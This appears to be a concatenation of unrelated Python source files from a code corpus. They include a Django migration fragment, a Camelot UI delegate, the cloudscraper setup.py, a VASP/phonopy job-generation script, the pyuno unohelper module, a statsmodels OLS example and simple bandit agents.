u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'}),
'response_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'survey.pages': {
'Meta': {'object_name': 'Pages'},
'associatedS': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Source']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pageNum': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
u'survey.question': {
'Meta': {'object_name': 'Question', 'db_table': "'questions'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'information': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_survey.question_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'question': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'response_type': ('django.db.models.fields.CharField', [], {'default': "'Int'", 'max_length': '6'}),
'section': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Section']"})
},
u'survey.response': {
'Meta': {'unique_together': "(('question', 'culture'),)", 'object_name': 'Response', 'db_table': "'responses'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'codersnotes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'culture': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Culture']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'missing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'new': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['survey.Pages']", 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_survey.response_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['survey.Question']"}),
'source': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'sources_info'", 'symmetrical': 'False', 'to': u"orm['core.Source']"}),
'uncertainty': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'survey.textresponse': {
'Meta': {'object_name': 'TextResponse', 'db_table': "'responses_texts'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['survey'] |
py | b41501f30e622415dda9117f380deb55ae6c22b8 | # ============================================================================
#
# Copyright (C) 2007-2016 Conceptive Engineering bvba.
# www.conceptive.be / [email protected]
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Conceptive Engineering nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ============================================================================
import six
from ....core.qt import Qt, variant_to_py
from camelot.view.controls.editors import MonthsEditor
from camelot.view.controls.delegates.customdelegate import CustomDelegate, DocumentationMetaclass
from camelot.core.utils import ugettext
from camelot.view.proxy import ValueLoading
@six.add_metaclass(DocumentationMetaclass)
class MonthsDelegate(CustomDelegate):
"""MonthsDelegate
custom delegate for showing and editing months and years
"""
editor = MonthsEditor
def __init__(self, parent=None, forever=200*12, **kwargs):
"""
:param forever: number of months that will be indicated as Forever, set
to None if not appliceable
"""
super(MonthsDelegate, self).__init__(parent=parent, **kwargs)
self._forever = forever
def sizeHint(self, option, index):
q = MonthsEditor(None)
return q.sizeHint()
def paint(self, painter, option, index):
painter.save()
self.drawBackground(painter, option, index)
value = variant_to_py( index.model().data( index, Qt.EditRole ) )
value_str = u''
if self._forever != None and value == self._forever:
value_str = ugettext('Forever')
elif value not in (None, ValueLoading):
years, months = divmod( value, 12 )
if years:
value_str = value_str + ugettext('%i years ')%(years)
if months:
value_str = value_str + ugettext('%i months')%(months)
self.paint_text(painter, option, index, value_str)
painter.restore()
|
py | b41502059d6bd3f672b1585207e20e2dd3a834db | import os
import re
from setuptools import setup, find_packages
from io import open
with open(os.path.join(os.path.dirname(__file__), 'cloudscraper', '__init__.py')) as fp:
VERSION = re.match(r'.*__version__ = \'(.*?)\'', fp.read(), re.S).group(1)
with open('README.md', 'r', encoding='utf-8') as fp:
readme = fp.read()
setup(
name = 'cloudscraper',
author = 'VeNoMouS',
author_email = '[email protected]',
version=VERSION,
packages = find_packages(exclude=['tests*']),
description = 'A Python module to bypass Cloudflare\'s anti-bot page.',
long_description=readme,
long_description_content_type='text/markdown',
url = 'https://github.com/venomous/cloudscraper',
keywords = [
'cloudflare',
'scraping',
'ddos',
'scrape',
'webscraper',
'anti-bot',
'waf',
'iuam',
'bypass',
'challenge'
],
include_package_data = True,
install_requires = [
'requests >= 2.9.2',
'requests_toolbelt >= 0.9.1',
'pyparsing >= 2.4.7',
'aiohttp >= 3.7.3'
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
|
py | b41502660e7346ac0d606d60523b2b8294a597ab | # -*- coding: utf-8 -*-
# __author__ = "Lukas Racbhauer"
# __copyright__ = "2019, TU Wien, Department of Geodesy and Geoinformation"
# __license__ = "mit"
#
#
# from pkg_resources import get_distribution, DistributionNotFound
# from qa4sm_reader import ncplot
#
# __all__ = ['ncplot']
#
# try:
# # Change here if project is renamed and does not equal the package name
# dist_name = __name__
# __version__ = get_distribution(dist_name).__version
# except DistributionNotFound:
# __version__ = 'unknown'
# finally:
# del get_distribution, DistributionNotFound
#
|
py | b41502945ec62d51a9a0c72a751ff9caf3b08cc9 | from collections import defaultdict
from torch import autograd
import torch.nn.functional as F
import numpy as np
class BaseTrainer(object):
''' Base trainer class.
trainer的基类
'''
def evaluate(self, *args, **kwargs):
''' Performs an evaluation.
'''
eval_list = defaultdict(list)
# for data in tqdm(val_loader):
eval_step_dict = self.eval_step()
for k, v in eval_step_dict.items():
eval_list[k].append(v)
# eval_dict = {k: v for k, v in eval_list.items()}
eval_dict = {k: np.mean(v) for k, v in eval_list.items()}
return eval_dict
def train_step(self, *args, **kwargs):
''' Performs a training step.
'''
raise NotImplementedError
def eval_step(self, *args, **kwargs):
''' Performs an evaluation step.
'''
raise NotImplementedError
def visualize(self, *args, **kwargs):
''' Performs visualization.
'''
raise NotImplementedError
def toggle_grad(model, requires_grad):
"""
自动微分的开关
"""
for p in model.parameters():
p.requires_grad_(requires_grad)
def compute_grad2(d_out, x_in):
"""
dy/dx
"""
batch_size = x_in.size(0)
grad_dout = autograd.grad(
outputs=d_out.sum(), inputs=x_in,
create_graph=True, retain_graph=True, only_inputs=True
)[0]
grad_dout2 = grad_dout.pow(2)
assert(grad_dout2.size() == x_in.size())
reg = grad_dout2.reshape(batch_size, -1).sum(1)
return reg
def update_average(model_tgt, model_src, beta):
# 关闭两个model的自动微分
toggle_grad(model_src, False)
toggle_grad(model_tgt, False)
param_dict_src = dict(model_src.named_parameters())
# 按比例将target model的参数更新
for p_name, p_tgt in model_tgt.named_parameters():
p_src = param_dict_src[p_name]
assert(p_src is not p_tgt)
p_tgt.copy_(beta*p_tgt + (1. - beta)*p_src)
def compute_bce(d_out, target):
"""
计算bce_loss
"""
targets = d_out.new_full(size=d_out.size(), fill_value=target)
loss = F.binary_cross_entropy_with_logits(d_out, targets)
return loss
|
py | b41503119b7015b6de8769b1071f16e475756c6a | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
Tag_ = namedtuple('Tag', ['key', 'value'])
class Tag(Tag_):
"""A tag, in the format [KEY]:[VALUE].
:type key: '~opencensus.tags.tag_key.TagKey'
:param key: Key in the tag
:type value: '~opencensus.tags.tag_key.TagValue'
:param value: Value of the key in the tag.
"""
pass
|
py | b415032f91991274ffac422dc281e9969758823a | #!/usr/bin/evn python
# _*_ coding: utf-8 _*_
import numpy as np
import sys
import os
import shutil
from pymatflow.remote.server import server_handle
from pymatflow.vasp.vasp import Vasp
"""
Usage:
python phonon_with_phonopy_vasp.py xxx.xyz
xxx.xyz is the input structure file
make sure the xyz structure file and the POTCAR is in the directory.
make sure the element in the POTCAR is in order of increasing the atom number of
the element: 确保POTCAR中元素排列的顺序是原子序数从小到大
Note:
参考: https://atztogo.github.io/phonopy/vasp.html
"""
class PhonopyRun(Vasp):
"""
"""
def __init__(self):
super().__init__()
self.incar.set_runtype(runtype="static")
self.supercell_n = [1, 1, 1]
def phonopy(self, directory="tmp-vasp-phonopy", runopt="gen", auto=0):
"""
directory: a place for all the generated files
"""
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile("POTCAR", os.path.join(directory, "POTCAR"))
os.system("cp %s %s/" % (self.poscar.xyz.file, directory))
# =======================================
# Constructing the input file for VASP
# =======================================
# ======================================
# Phonopy set up
# ======================================
# constructing the INCAR for the phonon calculation
self.incar.params["ISMEAR"] = 0
self.incar.params["SIGMA"] = 0.2
self.incar.params["IBRION"] = -1
self.incar.params["LWAVE"] = "F"
self.incar.params["LCHARG"] = "F"
#with open(os.path.join(directory, "INCAR"), 'w') as fout:
# self.incar.to_incar(fout)
with open(os.path.join(directory, "KPOINTS"), "w") as fout:
self.kpoints.to_kpoints(fout)
## Construct and run every POSCAR scf
with open(os.path.join(directory, "POSCAR"), 'w') as fout:
self.poscar.to_poscar(fout)
os.chdir(directory)
os.system("phonopy -d --dim='%d %d %d'" % (self.supercell_n[0], self.supercell_n[1], self.supercell_n[2]))
disps = self.get_disps("./")
for disp in disps:
os.mkdir("disp-%s" % (disp))
os.chdir("disp-%s" % (disp))
shutil.copyfile("../POSCAR-%s" % disp, "POSCAR")
#shutil.copyfile("../INCAR", "INCAR")
shutil.copyfile("../POTCAR", "POTCAR")
shutil.copyfile("../KPOINTS", "KPOINTS")
os.chdir("../")
os.chdir("../") # end of input generation chdir outside of the directory
# generate the llhpc script
with open(os.path.join(directory, "phonopy-job.slurm"), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s\n" % self.run_params["jobname"])
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("yhrun $PMF_VASP_STD\n")
fout.write("cd ../\n")
# generate the pbs script
with open(os.path.join(directory, "phonopy-job.pbs"), 'w') as fout:
fout.write("#!/bin/bash\n\n")
fout.write("#PBS -N %s\n" % self.run_params["jobname"])
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE -genv I_MPI_FABRICS shm:tmi %s\n" % ("$PMF_VASP_STD"))
fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
fout.write("cd ../\n")
# generate the local bash script
with open(os.path.join(directory, "phonopy-job.sh"), 'w') as fout:
fout.write("#!/bin/bash\n\n")
fout.write("\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("%s %s\n" % (self.run_params["mpi"], "$PMF_VASP_STD"))
fout.write("cd ../\n")
# generate lsf_sz bash script
with open(os.path.join(directory, "phonopy-job.lsf_sz"), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("APP_NAME=%s\n" % self.run_params["queue"])
fout.write("NP=%d\n" % self.run_params["nodes"]*self.run_params["ppn"]) #np)
fout.write("NP_PER_NODE=%d\n" % self.run_params["ppn"]) #np_per_node)
fout.write("RUN=\"RAW\"\n")
fout.write("CURDIR=$PWD\n")
fout.write("VASP=/home-yg/Soft/Vasp5.4/vasp_std\n")
fout.write("source /home-yg/env/intel-12.1.sh\n")
fout.write("source /home-yg/env/openmpi-1.6.5-intel.sh\n")
fout.write("cd $CURDIR\n")
fout.write("# starting creating ./nodelist\n")
fout.write("rm -rf $CURDIR/nodelist >& /dev/null\n")
fout.write("for i in `echo $LSB_HOSTS`\n")
fout.write("do\n")
fout.write(" echo \"$i\" >> $CURDIR/nodelist \n")
fout.write("done\n")
fout.write("ndoelist=$(cat $CURDIR/nodelist | uniq | awk \'{print $1}\' | tr \'\n\' \',\')\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("mpirun -np $NP -machinefile $CURDIR/nodelist $PMF_VASP_STD\n")
fout.write("cd ../\n")
# generate lsf_sustc bash script
with open(os.path.join(directory, "phonopy-job.lsf_sustc"), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#BSUB -J %s\n" % self.run_params["jobname"])
fout.write("#BSUB -q %s\n" % self.run_params["queue"])
fout.write("#BSUB -n %s\n" % (self.run_params["nodes"] * self.run_params["ppn"])) #number of total cores
fout.write("#BSUB -R \"span[ptile=%d]\"\n" % self.run_params["ppn"])
fout.write("hostfile=`echo $LSB_DJOB_HOSTFILE`\n")
fout.write("NP=`cat $hostfile | wc -l`\n")
fout.write("cd $LS_SUBCWD\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("mpirun -machinefile $LSB_DJOB_HOSTFILE -np $NP $PMF_VASP_STD\n")
fout.write("cd ../\n")
# non-analytical term correction (optional)
# 参见: https://atztogo.github.io/phonopy/vasp.html
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("bash phonopy-job.sh")
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="phonopy-job", server=self.run_params["server"])
def get_disps(self, directory="./"):
os.chdir(directory)
os.system("ls | grep 'POSCAR-' > pos.data")
disps = []
with open("pos.data", 'r') as fin:
for line in fin:
disps.append(line.split("\n")[0].split("-")[1])
return disps
|
py | b4150383e1df93bd3a097daa821c31318061bdfa | #**************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#**************************************************************
import uno
import pyuno
import os
import sys
from com.sun.star.lang import XTypeProvider, XSingleComponentFactory, XServiceInfo
from com.sun.star.uno import RuntimeException, XCurrentContext
from com.sun.star.beans.MethodConcept import ALL as METHOD_CONCEPT_ALL
from com.sun.star.beans.PropertyConcept import ALL as PROPERTY_CONCEPT_ALL
from com.sun.star.reflection.ParamMode import \
IN as PARAM_MODE_IN, \
OUT as PARAM_MODE_OUT, \
INOUT as PARAM_MODE_INOUT
from com.sun.star.beans.PropertyAttribute import \
MAYBEVOID as PROP_ATTR_MAYBEVOID, \
BOUND as PROP_ATTR_BOUND, \
CONSTRAINED as PROP_ATTR_CONSTRAINED, \
TRANSIENT as PROP_ATTR_TRANSIENT, \
READONLY as PROP_ATTR_READONLY, \
MAYBEAMBIGUOUS as PROP_ATTR_MAYBEAMBIGUOUS, \
MAYBEDEFAULT as PROP_ATTR_MAYBEDEFAULT, \
REMOVEABLE as PROP_ATTR_REMOVEABLE
def _mode_to_str( mode ):
ret = "[]"
if mode == PARAM_MODE_INOUT:
ret = "[inout]"
elif mode == PARAM_MODE_OUT:
ret = "[out]"
elif mode == PARAM_MODE_IN:
ret = "[in]"
return ret
def _propertymode_to_str( mode ):
ret = ""
if PROP_ATTR_REMOVEABLE & mode:
ret = ret + "removeable "
if PROP_ATTR_MAYBEDEFAULT & mode:
ret = ret + "maybedefault "
if PROP_ATTR_MAYBEAMBIGUOUS & mode:
ret = ret + "maybeambigous "
if PROP_ATTR_READONLY & mode:
ret = ret + "readonly "
if PROP_ATTR_TRANSIENT & mode:
ret = ret + "tranient "
if PROP_ATTR_CONSTRAINED & mode:
ret = ret + "constrained "
if PROP_ATTR_BOUND & mode:
ret = ret + "bound "
if PROP_ATTR_MAYBEVOID & mode:
ret = ret + "maybevoid "
return ret.rstrip()
def inspect( obj , out ):
if isinstance( obj, uno.Type ) or \
isinstance( obj, uno.Char ) or \
isinstance( obj, uno.Bool ) or \
isinstance( obj, uno.ByteSequence ) or \
isinstance( obj, uno.Enum ) or \
isinstance( obj, uno.Any ):
out.write( str(obj) + "\n")
return
ctx = uno.getComponentContext()
introspection = \
ctx.ServiceManager.createInstanceWithContext( "com.sun.star.beans.Introspection", ctx )
out.write( "Supported services:\n" )
if hasattr( obj, "getSupportedServiceNames" ):
names = obj.getSupportedServiceNames()
for ii in names:
out.write( " " + ii + "\n" )
else:
out.write( " unknown\n" )
out.write( "Interfaces:\n" )
if hasattr( obj, "getTypes" ):
interfaces = obj.getTypes()
for ii in interfaces:
out.write( " " + ii.typeName + "\n" )
else:
out.write( " unknown\n" )
access = introspection.inspect( obj )
methods = access.getMethods( METHOD_CONCEPT_ALL )
out.write( "Methods:\n" )
for ii in methods:
out.write( " " + ii.ReturnType.Name + " " + ii.Name )
args = ii.ParameterTypes
infos = ii.ParameterInfos
out.write( "( " )
for i in range( 0, len( args ) ):
if i > 0:
out.write( ", " )
out.write( _mode_to_str( infos[i].aMode ) + " " + args[i].Name + " " + infos[i].aName )
out.write( " )\n" )
props = access.getProperties( PROPERTY_CONCEPT_ALL )
out.write ("Properties:\n" )
for ii in props:
out.write( " ("+_propertymode_to_str( ii.Attributes ) + ") "+ii.Type.typeName+" "+ii.Name+ "\n" )
def createSingleServiceFactory( clazz, implementationName, serviceNames ):
return _FactoryHelper_( clazz, implementationName, serviceNames )
class _ImplementationHelperEntry:
def __init__(self, ctor,serviceNames):
self.ctor = ctor
self.serviceNames = serviceNames
class ImplementationHelper:
def __init__(self):
self.impls = {}
def addImplementation( self, ctor, implementationName, serviceNames ):
self.impls[implementationName] = _ImplementationHelperEntry(ctor,serviceNames)
def writeRegistryInfo( self, regKey, smgr ):
for i in list(self.impls.items()):
keyName = "/"+ i[0] + "/UNO/SERVICES"
key = regKey.createKey( keyName )
for serviceName in i[1].serviceNames:
key.createKey( serviceName )
return 1
def getComponentFactory( self, implementationName , regKey, smgr ):
entry = self.impls.get( implementationName, None )
if entry == None:
raise RuntimeException( implementationName + " is unknown" , None )
return createSingleServiceFactory( entry.ctor, implementationName, entry.serviceNames )
def getSupportedServiceNames( self, implementationName ):
entry = self.impls.get( implementationName, None )
if entry == None:
raise RuntimeException( implementationName + " is unknown" , None )
return entry.serviceNames
def supportsService( self, implementationName, serviceName ):
entry = self.impls.get( implementationName,None )
if entry == None:
raise RuntimeException( implementationName + " is unknown", None )
return serviceName in entry.serviceNames
class ImplementationEntry:
def __init__(self, implName, supportedServices, clazz ):
self.implName = implName
self.supportedServices = supportedServices
self.clazz = clazz
def writeRegistryInfoHelper( smgr, regKey, seqEntries ):
for entry in seqEntries:
keyName = "/"+ entry.implName + "/UNO/SERVICES"
key = regKey.createKey( keyName )
for serviceName in entry.supportedServices:
key.createKey( serviceName )
def systemPathToFileUrl( systemPath ):
"returns a file-url for the given system path"
return pyuno.systemPathToFileUrl( systemPath )
def fileUrlToSystemPath( url ):
"returns a system path (determined by the system, the python interpreter is running on)"
return pyuno.fileUrlToSystemPath( url )
def absolutize( path, relativeUrl ):
"returns an absolute file url from the given urls"
return pyuno.absolutize( path, relativeUrl )
def getComponentFactoryHelper( implementationName, smgr, regKey, seqEntries ):
for x in seqEntries:
if x.implName == implementationName:
return createSingleServiceFactory( x.clazz, implementationName, x.supportedServices )
def addComponentsToContext( toBeExtendedContext, contextRuntime, componentUrls, loaderName ):
smgr = contextRuntime.ServiceManager
loader = smgr.createInstanceWithContext( loaderName, contextRuntime )
implReg = smgr.createInstanceWithContext( "com.sun.star.registry.ImplementationRegistration",contextRuntime)
isWin = os.name == 'nt' or os.name == 'dos'
isMac = sys.platform == 'darwin'
# create a temporary registry
for componentUrl in componentUrls:
reg = smgr.createInstanceWithContext( "com.sun.star.registry.SimpleRegistry", contextRuntime )
reg.open( "", 0, 1 )
if not isWin and componentUrl.endswith( ".uno" ): # still allow platform independent naming
if isMac:
componentUrl = componentUrl + ".dylib"
else:
componentUrl = componentUrl + ".so"
implReg.registerImplementation( loaderName,componentUrl, reg )
rootKey = reg.getRootKey()
implementationKey = rootKey.openKey( "IMPLEMENTATIONS" )
implNames = implementationKey.getKeyNames()
extSMGR = toBeExtendedContext.ServiceManager
for x in implNames:
fac = loader.activate( max(x.split("/")),"",componentUrl,rootKey)
extSMGR.insert( fac )
reg.close()
# never shrinks !
_g_typeTable = {}
def _unohelper_getHandle( self):
ret = None
if self.__class__ in _g_typeTable:
ret = _g_typeTable[self.__class__]
else:
names = {}
traverse = list(self.__class__.__bases__)
while len( traverse ) > 0:
item = traverse.pop()
bases = item.__bases__
if uno.isInterface( item ):
names[item.__pyunointerface__] = None
elif len(bases) > 0:
# the "else if", because we only need the most derived interface
traverse = traverse + list(bases)#
lst = list(names.keys())
types = []
for x in lst:
t = uno.getTypeByName( x )
types.append( t )
ret = tuple(types) , uno.generateUuid()
_g_typeTable[self.__class__] = ret
return ret
class Base(XTypeProvider):
def getTypes( self ):
return _unohelper_getHandle( self )[0]
def getImplementationId(self):
return _unohelper_getHandle( self )[1]
class CurrentContext(XCurrentContext, Base ):
"""a current context implementation, which first does a lookup in the given
hashmap and if the key cannot be found, it delegates to the predecessor
if available
"""
def __init__( self, oldContext, hashMap ):
self.hashMap = hashMap
self.oldContext = oldContext
def getValueByName( self, name ):
if name in self.hashMap:
return self.hashMap[name]
elif self.oldContext != None:
return self.oldContext.getValueByName( name )
else:
return None
# -------------------------------------------------
# implementation details
# -------------------------------------------------
class _FactoryHelper_( XSingleComponentFactory, XServiceInfo, Base ):
def __init__( self, clazz, implementationName, serviceNames ):
self.clazz = clazz
self.implementationName = implementationName
self.serviceNames = serviceNames
def getImplementationName( self ):
return self.implementationName
def supportsService( self, ServiceName ):
return ServiceName in self.serviceNames
def getSupportedServiceNames( self ):
return self.serviceNames
def createInstanceWithContext( self, context ):
return self.clazz( context )
def createInstanceWithArgumentsAndContext( self, args, context ):
return self.clazz( context, *args )
|
py | b41504aaa782cab69ad0cab9e5b4f0cec5c5ae2a | # -*- coding: utf-8 -*-
"""Out of sample prediction
"""
import numpy as np
import statsmodels.api as sm
#Create some data
nsample = 50
sig = 0.25
x1 = np.linspace(0, 20, nsample)
X = np.c_[x1, np.sin(x1), (x1 - 5)**2, np.ones(nsample)]
beta = [0.5, 0.5, -0.02, 5.]
y_true = np.dot(X, beta)
y = y_true + sig * np.random.normal(size=nsample)
#Setup and estimate the model
olsmod = sm.OLS(y, X)
olsres = olsmod.fit()
print olsres.params
print olsres.bse
#In-sample prediction
ypred = olsres.predict(X)
#Create a new sample of explanatory variables Xnew, predict and plot
x1n = np.linspace(20.5, 25, 10)
Xnew = np.c_[x1n, np.sin(x1n), (x1n - 5)**2, np.ones(10)]
ynewpred = olsres.predict(Xnew) # predict out of sample
print ypred
import matplotlib.pyplot as plt
plt.figure();
plt.plot(x1, y, 'o', x1, y_true, 'b-');
plt.plot(np.hstack((x1, x1n)), np.hstack((ypred, ynewpred)), 'r');
#@savefig ols_predict.png
plt.title('OLS prediction, blue: true and data, fitted/predicted values:red');
|
py | b41504da18b7b2de327f446da666bffb7d4a44f1 | import numpy as np
from scipy.stats import beta
from basics.base_agent import BaseAgent
class Agent(BaseAgent):
"""agent does *no* learning, selects random action always"""
def __init__(self):
super().__init__()
self.arm_count = None
self.last_action = None
self.num_actions = None
self.q_values = None
self.step_size = None
self.initial_value = 0.0
self.batch_size = None
self.q_values_oracle = None # used for batch updates
def agent_init(self, agent_info=None):
"""Setup for the agent called when the experiment first starts."""
if agent_info is None:
agent_info = {}
self.num_actions = agent_info.get("num_actions", 2)
self.initial_value = agent_info.get("initial_value", 0.0)
self.q_values = np.ones(agent_info.get("num_actions", 2)) * self.initial_value
self.step_size = agent_info.get("step_size", 0.1)
self.batch_size = agent_info.get('batch_size', 1)
self.q_values_oracle = self.q_values.copy()
self.arm_count = np.zeros(self.num_actions) # [0.0 for _ in range(self.num_actions)]
# self.last_action = np.random.choice(self.num_actions) # set first action to random
def agent_start(self, observation):
"""The first method called when the experiment starts, called after
the environment starts.
Args:
observation (Numpy array): the state observation from the
environment's evn_start function.
Returns:
The first action the agent takes.
"""
self.last_action = np.random.choice(self.num_actions)
return self.last_action
def agent_step(self, reward, observation):
"""A step taken by the agent.
Args:
reward (float): the reward received for taking the last action taken
observation (Numpy array): the state observation from the
environment's step based, where the agent ended up after the
last step
Returns:
The action the agent is taking.
"""
# local_action = 0 # choose the action here
self.last_action = np.random.choice(self.num_actions)
return self.last_action
def agent_end(self, reward):
pass
def agent_cleanup(self):
pass
def agent_message(self, message):
pass
def argmax(q_values):
"""
Takes in a list of q_values and returns the index of the item
with the highest value. Breaks ties randomly.
returns: int - the index of the highest value in q_values
"""
top_value = float("-inf")
ties = []
for i in range(len(q_values)):
if q_values[i] > top_value:
ties = [i]
top_value = q_values[i]
elif q_values[i] == top_value:
ties.append(i)
return np.random.choice(ties)
class GreedyAgent(Agent):
def __init__(self):
super().__init__()
def agent_init(self, agent_info=None):
if agent_info is None:
agent_info = {}
super().agent_init(agent_info)
def agent_step(self, reward, observation):
"""
Takes one step for the agent. It takes in a reward and observation and
returns the action the agent chooses at that time step.
Arguments:
reward -- float, the reward the agent received from the environment after taking the last action.
observation -- float, the observed state the agent is in. Do not worry about this as you will not use it
until future lessons
Returns:
current_action -- int, the action chosen by the agent at the current time step.
"""
a = self.last_action
self.arm_count[a] += 1
self.q_values_oracle[a] = self.q_values_oracle[a] + 1 / self.arm_count[a] * (reward - self.q_values_oracle[a])
if sum(self.arm_count) % self.batch_size == 0:
self.q_values = self.q_values_oracle.copy()
current_action = argmax(self.q_values)
self.last_action = current_action
return current_action
